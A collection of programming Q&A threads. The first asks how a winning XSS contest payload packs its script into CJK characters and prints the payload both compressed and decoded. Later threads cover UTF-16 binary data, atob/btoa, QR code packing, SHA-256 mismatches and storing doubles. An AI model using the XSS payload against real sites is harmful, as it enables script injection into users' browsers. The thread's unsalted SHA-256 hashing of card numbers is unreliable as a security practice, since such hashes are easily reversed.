How does this JavaScript compression technique work? - javascript

I was checking the results of a security contest involving XSS (link) and found some wonderful and scary JS XSS payloads. The winner (#kinugawamasato) used a JavaScript compression technique that seems completely otherworldly to me:
Compressed payload:
https://cure53.de/xmas2013/?xss=<scriPt>document.write(unescape(escape(location)
.replace(/u(..)/g,'$1%')))<\/scriPt>㱯扪散琠楤㵥⁣污獳楤㵣汳楤㨳㌳䌷䉃㐭㐶うⴱㅄ〭
䉃〴ⴰ〸ぃ㜰㔵䄸㌠潮牯睥湴敲㵡汥牴⠯繷⸪ℱ⼮數散⡲散潲摳整⠰⤩⤾㱳癧湬潡搽攮摡瑡畲氽慬汛攮
牯睤敬業㴳㍝⬧㽳慮瑡㵀Ⅱ汬潷彤潭慩湳㴧⭤潭慩渻攮捨慲獥琽❵瑦ⴷ✾
What really happened:
<object id=e classid=clsid:333C7BC4-460F-11D0-BC04-0080C7055A83 onrowenter=alert(/~w.*!1/.exec(recordset(0)))><svg onload=e.dataurl=all[e.rowdelim=33]+'?santa=#!allow_domains='+domain;e.charset='utf-7'>
Is this technique already documented somewhere so I can study it? How exactly does it work? Is there already a JavaScript compressor that does this in an automated way? How would a WAF react to a payload like that?
You can see more examples here.
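For reference, here is a minimal sketch (my own, not from the contest) of what the escape/replace/unescape chain in the payload does: each UTF-16 character in the URL carries two ASCII bytes, and the chain splits them apart again.

// The first two characters of the packed payload above are U+3C6F and U+626A.
const packed = "\u3C6F\u626A";
const step1 = escape(packed);                  // "%u3C6F%u626A"
const step2 = step1.replace(/u(..)/g, "$1%");  // "%3C%6F%62%6A"
console.log(unescape(step2));                  // "<obj" - the start of the decoded payload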

I am using the lz-string library for JS compression whenever I place data into localStorage. I am just a user of this library, not a compression expert, but here is the information that can be found around that tool...
The lz-string Goal:
lz-string was designed to fulfill the need of storing large amounts of data in localStorage, specifically on mobile devices. localStorage being usually limited to 5MB, all you can compress is that much more data you can store.
...
I (note: "I" means Pieroxy, the author of lz-string) started out from an LZW implementation (no more patents on that), which is very simple...
So the foundation of this implementation is LZW, which is mentioned in Javascript client-data compression by Andy E. Let me point out:
the link to the Wikipedia article on LZW
the LZW compression example.
An extract from Wikipedia - Algorithm:
The scenario described by Welch's 1984 paper encodes sequences of 8-bit data as fixed-length 12-bit codes. The codes from 0 to 255 represent 1-character sequences consisting of the corresponding 8-bit character, and the codes 256 through 4095 are created in a dictionary for sequences encountered in the data as it is encoded. At each stage in compression, input bytes are gathered into a sequence until the next character would make a sequence for which there is no code yet in the dictionary. The code for the sequence (without that character) is added to the output, and a new code (for the sequence with that character) is added to the dictionary.
Wikipedia - Encoding:
A high level view of the encoding algorithm is shown here:
Initialize the dictionary to contain all strings of length one.
Find the longest string W in the dictionary that matches the current input.
Emit the dictionary index for W to output and remove W from the input.
Add W followed by the next symbol in the input to the dictionary.
Go to Step 2.
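To make the steps above concrete, here is a minimal sketch of a textbook LZW encoder (byte-initialized dictionary, integer output codes); this is the plain algorithm, not lz-string's modified version discussed below.

function lzwEncode(input) {
    const dict = new Map();
    for (let i = 0; i < 256; i++) dict.set(String.fromCharCode(i), i); // step 1: single-character entries
    let w = "";
    const output = [];
    for (const c of input) {
        const wc = w + c;
        if (dict.has(wc)) {
            w = wc;                              // step 2: keep extending the current match
        } else {
            output.push(dict.get(w));            // step 3: emit the code for W
            dict.set(wc, dict.size);             // step 4: add W + next symbol to the dictionary
            w = c;
        }
    }
    if (w !== "") output.push(dict.get(w));      // flush the last match
    return output;
}

console.log(lzwEncode("TOBEORNOTTOBEORTOBEORNOT"));
// [84, 79, 66, 69, 79, 82, 78, 79, 84, 256, 258, 260, 265, 259, 261, 263]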
How it works in the case of lz-string we can observe here:
The source code: lz-string-1.3.3.js
Let me cite a few steps from the already mentioned lz-string source:
What I did was:
localStorage can only contain JavaScript strings. Strings in JavaScript are stored internally in UTF-16, meaning every character weighs 16 bits. I modified the implementation to work with a 16bit-wide token space.
I had to remove the default dictionary initialization, totally useless on a 16bit-wide token space.
I initialize the dictionary with three tokens:
An entry that produces a 16-bit token.
An entry that produces an 8-bit token, because most of what I will store is in the iso-latin-1 space, meaning tokens below 256.
An entry that marks the end of the stream.
The output is processed by a bit stream that stores effectively 16 bits per character in the output string.
Each token is stored with just as many bits as are needed according to the size of the dictionary. Hence, the first token takes 2 bits, the second to 7th three bits, etc....
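A toy sketch of the bit-stream idea quoted above (my own illustration, not lz-string's actual code): codes of varying width are written into a buffer and flushed sixteen bits at a time as one character of the output string.

class BitWriter {
    constructor() { this.out = ""; this.buffer = 0; this.bits = 0; }
    write(value, width) {                        // append `width` bits of `value`
        for (let b = width - 1; b >= 0; b--) {
            this.buffer = (this.buffer << 1) | ((value >> b) & 1);
            if (++this.bits === 16) {            // one full 16-bit output character
                this.out += String.fromCharCode(this.buffer);
                this.buffer = 0;
                this.bits = 0;
            }
        }
    }
    finish() {                                   // left-align and flush the remaining bits
        if (this.bits > 0) this.out += String.fromCharCode(this.buffer << (16 - this.bits));
        return this.out;
    }
}

const writer = new BitWriter();
writer.write(2, 2);                              // a 2-bit token
writer.write(65, 8);                             // an 8-bit token
console.log(writer.finish().length);             // 1 output character holds both tokens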
Well, now we know that this compression technique produces output in 16-bit units. We can test it in this demo: http://pieroxy.net/blog/pages/lz-string/demo.html (and/or another one here),
which converts Hello, world. into
85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26
00 a2
So we need the final step, let me cite again:
Well, this lib produces stuff that isn't really a string. By using all 16 bits of the UTF-16 bitspace, those strings aren't exactly valid UTF-16. In version 1.3.0, I added two helper encoders to produce stuff that we can do something with:
compress produces invalid UTF-16 strings. Those can be stored in localStorage only on webkit browsers (Tested on Android, Chrome, Safari). Can be decompressed with decompress
To continue our example, Hello, world. would be converted into
҅〶惶̀Ў㦀☃ꈀ
And that's finally it. We can see that all the non-Latin characters come from the final conversion into UTF-16. I hope this gives some hints...
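A small usage sketch, assuming the lz-string library is loaded and exposes its usual LZString global; for such a short input the output is barely shorter, but every output character carries a full 16 bits of compressed data.

const packed = LZString.compress("Hello, world.");
console.log(packed);                                   // a "҅〶惶̀Ў㦀☃ꈀ"-style string as shown above
localStorage.setItem("demo", packed);                  // per the quote above, only safe on WebKit browsers
console.log(LZString.decompress(localStorage.getItem("demo"))); // "Hello, world."
// LZString.compressToUTF16/decompressFromUTF16 produce valid UTF-16 and are
// the safer choice for localStorage across browsers.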

Related

I need to convert a binary string to ascii array using javascript. (UTF-16 to ascii conversion) [closed]

I want to read "binary" data from a text file into a JavaScript string (which I did) and convert the bytes to an array of ASCII values. I have been trying to accomplish this for a few days and could not find a solution, as I do not have enough experience with UTF-16 or JS.
The data I am trying to convert is not text. Most of the examples on the site deal with strings like "Hello", which I could not get to work. The binary data consists of some bytes (220032 to be precise) whose values are between 0 and 255.
I would be grateful if someone could point me to the right direction.
Example:
the original file consists of (the byte array I want to get):
hex: 80 00 F5 03 7E 36 41 01 (decimal : 128 0 245 3 126 54 65 1)
for these bytes i get (using charCodeAt):
decimal : 65533 0 65533 3 121 94 20 1
Some more information about the question, as Stack Overflow stated that it was not clear enough.
I have a thermal camera with a resolution of 382x288, which means 110016 pixels. Every pixel is represented by an unsigned short, which is 2 bytes per pixel, making one frame of thermal data 220032 bytes. I have limited space, so I am not considering JSON, XML, etc. I got the data from the camera using a C++ program that I wrote and wrote it to a text file as ASCII characters.
The customer wanted to see the image on a local server throughout his company (TVs, computers, tablets, etc.), so I decided to take the ASP/JavaScript route for this project. I am not very good with JavaScript, so I did not know until much later that JavaScript uses UTF-16 for strings, which I did not want, as I needed the ASCII codes of each character in the file.
Thanks to 'Joachim Sauer', who pointed me in the right direction, I was able to solve the issue without much hassle using fetch and Uint8Array.
async load_Frame(p_filename) {
    await fetch("./frames/" + p_filename + ".txt")
        .then(response => {
            if (!response.ok) throw new Error("problem");
            // Read the body as raw bytes instead of decoding it as text
            return response.arrayBuffer();
        })
        .then(data => {
            // Here I have the frame as I wanted: one entry per byte (0-255)
            let frame = new Uint8Array(data);
        })
        .catch(function (e) {
            console.log(e);
        });
}
and the final product. :)
I did not include the thermal conversion routines as they were out of the scope of the question.
You can't interpret arbitrary binary data as UTF-8 and expect it to work (i.e. be able to round-trip).
UTF-8 has a certain amount of error-detection built in, which means there's plenty of byte sequences that are not valid UTF-8.
Those will result in errors.
Usually those errors will be silently signaled by producing a Unicode Replacement Character U+FFFD, but they could also be reported via an exception or error code of some kind.
U+FFFD also happens to be the Unicode codepoint 65533, so that's exactly what's happening here.
One or more bytes that are not a valid UTF-8 sequence are "decoded" into this replacement character. Note that the erroneous bytes are no longer visible in the resulting string: all erroneous sequences are collapsed to that one character. There are specific rules how multiple subsequent errors are to be handled, but fundamentally you just lose that information.
I can't really tell you how to "fix" this, because fundamentally trying to interpret non-text binary data as UTF-8 will just not work.
If you explained why you want to do this, we could maybe suggest alternative solutions. This is probably an XY Problem.
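To make the failure mode concrete, here is a small sketch (mine, using TextDecoder) of what happens when the raw camera bytes from the question are decoded as text instead of being kept as bytes:

// Decoding raw bytes as UTF-8 turns every invalid sequence into U+FFFD (65533);
// reading the response as an ArrayBuffer keeps the original byte values.
const bytes = new Uint8Array([0x80, 0x00, 0xF5, 0x03]);    // first bytes of the question's example

const asText = new TextDecoder("utf-8").decode(bytes);
console.log([...asText].map(c => c.codePointAt(0)));       // [65533, 0, 65533, 3]

console.log(Array.from(bytes));                            // [128, 0, 245, 3] - what the asker wanted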

Why were Javascript `atob()` and `btoa()` named like that?

In JavaScript, the window.atob() method decodes a Base64 string and the window.btoa() method encodes a string into Base64.
Then why weren't they named like base64Decode() and base64Encode()?
atob() and btoa() don't make sense because they're not semantic at all.
I want to know the reason.
The atob() and btoa() methods allow authors to transform content to and from the base64 encoding.
In these APIs, for mnemonic purposes, the "b" can be considered to
stand for "binary", and the "a" for "ASCII". In practice, though, for
primarily historical reasons, both the input and output of these
functions are Unicode strings.
From : http://www.w3.org/TR/html/webappapis.html#atob
I know this is old, but it recently came up on Twitter, and I thought I'd share it as it is authoritative.
Me:
#BrendanEich did you pick those names?
Him:
Old Unix names, hard to find man pages rn but see
https://www.unix.com/man-page/minix/1/btoa/ …. The names carried over
from Unix into the Netscape codebase. I reflected them into JS in a
big hurry in 1995 (after the ten days in May but soon).
In case the Minix link breaks, here's the man page content:
BTOA(1) BTOA(1)
NAME
btoa - binary to ascii conversion
SYNOPSIS
btoa [-adhor] [infile] [outfile]
OPTIONS
-a Decode, rather than encode, the file
-d Extracts repair file from diagnosis file
-h Help menu is displayed giving the options
-o The obsolete algorithm is used for backward compatibility
-r Repair a damaged file
EXAMPLES
btoa <a.out >a.btoa # Convert a.out to ASCII
btoa -a <a.btoa >a.out          # Reverse the above
DESCRIPTION
Btoa is a filter that converts a binary file to ascii for transmission over a telephone line. If two file names are provided, the first is used for input and the second for output. If only one is provided, it is used as the input file. The program is a functionally similar alternative to uue/uud, but the encoding is completely different. Since both of these are widely used, both have been provided with MINIX. The file is expanded about 25 percent in the process.
SEE ALSO
uue(1), uud(1).
Source: Brendan Eich, the creator of JavaScript. https://twitter.com/BrendanEich/status/998618208725684224
To sum up the already given answers:
atob stands for ASCII to binary
e.g.: atob("ZXhhbXBsZSELCg==") == "example!^K"
btoa stands for binary to ASCII
e.g.: btoa("\x01\x02\xfe\xff") == "AQL+/w=="
Why ASCII and binary:
ASCII (the a) is the result of Base64 encoding: safe text composed only of a subset of ASCII characters(*) that can be correctly represented and transported (e.g. in an email body),
binary (the b) is any stream of 0s and 1s (in JavaScript it must be represented with a string type).
(*) in base64 these are limited to: A-Z, a-z, 0-9, +, / and = (padding, only at the end) https://en.wikipedia.org/wiki/Base64
P.S. I must admit I myself was initially confused by the naming and thought the names were swapped. I thought that b stands for "base64 encoded string" and a for "any string" :D.
The names come from a unix function with similar functionality, but you can already read that in other answers here.
Here is my mnemonic to remember which one to use. This doesn't really answer the question itself, but might help people figure which one of the functions to use without keeping a tab open on this question on stack overflow all day long.
Beautiful to Awful btoa
Take something Beautiful (aka, beautiful content that would make sense to your application: json, xml, text, binary data) and transform it to something Awful, that cannot be understood as is (aka: encoded).
Awful to Beautiful atob
The exact opposite of btoa
Note
Some may say that binary is not beautiful, but hey, this is only a trick to help you.
I can't locate a source at the moment, but it is common knowledge that in this case, the b stands for 'binary', and the a for 'ASCII'.
Therefore, the functions are actually named:
ASCII to Binary for atob(), and
Binary to ASCII for btoa().
Note that this is a browser implementation, and was left in for legacy / backwards-compatibility purposes. In Node.js, for example, these don't exist.

Storing more info in QR Code

I am trying to develop a hybrid mobile app with QR code functionality. A QR code can store only a limited number of characters. So I am wondering: is it possible to compress the string to make it shorter, so that I can store more info in the QR code?
At lengths that short, most compression algorithms will actually make data longer, not shorter. There are some algorithms which may work well, though… smaz comes to mind. However, it is going to depend heavily on what you are trying to compress, and you haven't really provided any information about that.
Instead of thinking about compression, your best bet may be to find an encoding scheme which makes more sense for your data. For example, if you're encoding a date and time, store it as a single number instead of text. Think about whether you really need seconds. If you are storing numbers, consider using variable-length quantities. If your data is JSON, consider using protobuf instead.
If what you have really is text, it may be worth coming up with your own character set. Instead of ASCII, where each character takes 8 bits, can you limit yourself to 64 characters? a-z, A-Z, 0-9, and two punctuation characters is only 64 possible symbols… if that is all you need, you could use a 6-bit encoding. If the strings aren't case-sensitive you have tons of room for punctuation.
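As a rough sketch of the 6-bit idea (the alphabet below is just one possible choice, not something the answer prescribes), four symbols can be packed into every three bytes:

const ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 .";  // 64 symbols

function packSixBit(text) {
    const bits = [];
    for (const ch of text) {
        const v = ALPHABET.indexOf(ch);
        if (v < 0) throw new Error("character not in alphabet: " + ch);
        for (let b = 5; b >= 0; b--) bits.push((v >> b) & 1);   // 6 bits per symbol, MSB first
    }
    const bytes = new Uint8Array(Math.ceil(bits.length / 8));   // pack the bit stream into bytes
    bits.forEach((bit, i) => { bytes[i >> 3] |= bit << (7 - (i % 8)); });
    return bytes;
}

console.log(packSixBit("Hello QR").length);  // 6 bytes instead of 8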

SHA-256 hashes different between C# and Javascript

I am currently working on a project that will involve credit card swipes for admissions based on database rows. Like a will call system, the SHA-256 hash of the CC number must match the hash in the DB row in order to be considered the "proper pickup".
However, because the box office system is based in the browser, the CC number on pickup must be hashed client-side, using Javascript, and then compared to the previously downloaded will call data.
However when trying to hash the numbers, the hash always ends up different than what was hashed when the DB row was created (using VB.NET and SQL Server 2008 R2). For example, if a CC number in the database happened to be 4444333322221111, then the resulting hash from .NET would become xU6sVelMEme0N8aEcCKlNl5cG25kl8Mo5pzTowExenM=.
However, when using any SHA-256 hash library for Javascript I could find, the resulting hash would always be NbjuSagE7lHVQzKSZG096bHtQoMLscYAXyuCXX0Wtw0=.
I'm assuming this is some kind of Unicode/UTF-8 issue, but no matter what I try I cannot get the hashes to come out the same and it's starting to drive me crazy. Can anyone offer any advice?
Here's something that may provide some insight. Please go to http://www.insidepro.com/hashes.php?lang=eng and insert "4444333322221111" without quotes into the Password box. Afterwards, scroll down to the SHA-256 section.
You can see that there are four results; two of them are the hash codes I posted (the second from the top being the JavaScript hash and the bottom one being the SQL hash). According to that page, the bottom hash result is generated using a Base64 string, as well as converting the password into Unicode format.
I've investigated this and tried many different functions to encode the password into unicode format, but no matter what little tweaks I try or other functions I make, I could never get it to match the hash code I need.
I am currently investigating the parameters used when calling the SHA-256 function on the server side.
UPDATE:
So just to make sure I wasn't crazy, I ran the Hash method I'm using for the CC numbers in the immediate window while debugging. Again, the result remains the same as before. You can see a screenshot here: http://i.imgur.com/raEyX.png
According to an online SHA-256 hash calculator and a Base64-to-hex decoder, it is the .NET implementation that has not calculated the hash correctly. You may want to double-check the parameters you pass to the hashing functions.
When you are dealing with two untrusted implementations, it is always a good idea to find another independent implementation, and choose the one that matches the third one as correct. Either that, or find some test vectors, and validate the implementations individually.
EDIT:
A quick experiment shows that the SHA-256 hash you get from .NET matches the hex string 3400340034003400330033003300330032003200320032003100310031003100 - little-endian 16-bit characters. Make sure you pass in ASCII.
Adam Liss had it right when he mentioned that the byte arrays for strings in .NET/SQL Server are different from those in JavaScript. The array in .NET for the string 4444333322221111 would look like [52 0 52 0 52 0 52 0 51 0 51 0... etc.] and the same thing in JavaScript would just look like [52 52 52 52 51 51 51 51...]. Thus, with different byte arrays, different hashes were generated.
I was able to remedy this for my application by modifying the base 64 SHA-256 hashing algorithm from here, where each character is pulled from the string one at a time in order to generate the hash.
Rather than having it do it this way, I first converted the string into a Unicode-style byte array (like the .NET example above, 52 0 52 0 etc.), fed that array to the hashing algorithm instead of the string, and made some very minor tweaks so that it grabs each array member to generate the hash. Lo and behold, it worked, and now I have a very convenient method of hashing CC numbers in the same fashion as the .NET framework for quick and easy order lookup.
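A sketch of the same diagnosis using the browser's Web Crypto API (the helper names here are my own): hashing the UTF-16LE bytes should reproduce the .NET/SQL Server digest quoted above, while hashing the ASCII bytes should reproduce the one from the JavaScript libraries.

// Requires a secure context (https) for crypto.subtle.
async function sha256Base64(bytes) {
    const digest = await crypto.subtle.digest("SHA-256", bytes);
    return btoa(String.fromCharCode(...new Uint8Array(digest)));
}

function utf16leBytes(str) {                       // same layout as .NET's Encoding.Unicode
    const out = new Uint8Array(str.length * 2);
    for (let i = 0; i < str.length; i++) {
        const code = str.charCodeAt(i);
        out[i * 2] = code & 0xff;                  // low byte first (little endian)
        out[i * 2 + 1] = code >> 8;                // high byte second
    }
    return out;
}

const cc = "4444333322221111";
sha256Base64(utf16leBytes(cc)).then(console.log);             // UTF-16LE bytes: 52 0 52 0 ...
sha256Base64(new TextEncoder().encode(cc)).then(console.log); // ASCII bytes: 52 52 52 52 ...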
Are you sure about your JavaScript SHA-256 function? And about your first generated hash?
SHA-256("4444333322221111"); // 35b8ee49a804ee51d5433292646d3de9b1ed42830bb1c6005f2b825d7d16b70d
hex: 35b8ee49a804ee51d5433292646d3de9b1ed42830bb1c6005f2b825d7d16b70d
HEX: 35B8EE49A804EE51D5433292646D3DE9B1ED42830BB1C6005F2B825D7D16B70D
h:e:x: 35:b8:ee:49:a8:04:ee:51:d5:43:32:92:64:6d:3d:e9:b1:ed:42:83:0b:b1:c6:00:5f:2b:82:5d:7d:16:b7:0d
base64: NbjuSagE7lHVQzKSZG096bHtQoMLscYAXyuCXX0Wtw0=

How to store large sequences of doubles as literal string in javascript file

What is the best way to store ca. 100 sequences of doubles directly in the JS file? Each sequence will have a length of ca. 10,000 doubles or more.
Requirements
the javascript file must be executed as fast as possible
it is enough for me to iterate through the sequence on demand (I do not need to decode all the numbers at JS execution time; they will be decoded on an event)
it shouldn't take too much space
The simplest option is probably to use a CSV-format string, but then the doubles are not stored in the most efficient manner, right?
Another option might be to store the numbers as a Base64-encoded byte array, but then I have no idea how to read the Base64 string back into doubles.
EDIT:
I would like to use the doubles to transform the Matrix4x4 of 3D nodes in Adobe 3D annotations. Adobe allows importing external files, but it is so complicated that it might be simpler to include all the data in the JS file directly.
As I mentioned in my comment, it is probably not worth it to try and encode the values. Here are some rough figures on the amount of data required to store doubles (updated from my comment).
Assuming 1,000,000 values:
Using direct encoding (won't work well in a JS file): 8 B = 8 MB
Using base64: 10.7 B = 10.7 MB
Literals (best case): 1 B + delimiter = 2 MB
Literals (worst case): 21 B + delimiter = 22 MB
Literals (average case assuming evenly distributed values): 19 B + delimiter = 20 MB
Note: A double can take 21 bytes (assuming 15 digits of precision) in the worst case like this: 1.23456789101112e-131
As you can see, even with encoding you won't get below about half the size of plain literal values, and if you plan on doing random-access decoding it will get complicated fast. It may be best to stick to literals. You might get some benefit from using the external file that you mentioned, but that depends on how much effort is needed to do so.
Some ideas on how to optimize using literals:
Depending on the precision required, you could approximate the values and limit them to, say, 5 digits of precision. This would shorten the file considerably.
You could compress the file. Any sequence of doubles can be written using only 14 distinct characters (0123456789.e-,), so theoretically you could compress such a string to about half its size. I don't know how good practical modern compression routines are, though.
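For the Base64 option raised in the question (reading a Base64 string back into doubles), here is a hedged sketch that assumes the bytes are raw IEEE-754 float64 values in little-endian order; the example literal below encodes [1.5, -2.25].

function base64ToDoubles(encoded) {
    const binary = atob(encoded);                    // Base64 -> byte string
    const bytes = new Uint8Array(binary.length);
    for (let i = 0; i < binary.length; i++) {
        bytes[i] = binary.charCodeAt(i);
    }
    // Reinterpret the bytes as 64-bit floats (8 bytes per value, platform byte order,
    // which is little endian on typical hardware).
    return new Float64Array(bytes.buffer);
}

console.log(base64ToDoubles("AAAAAAAA+D8AAAAAAAACwA=="));    // Float64Array [1.5, -2.25]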
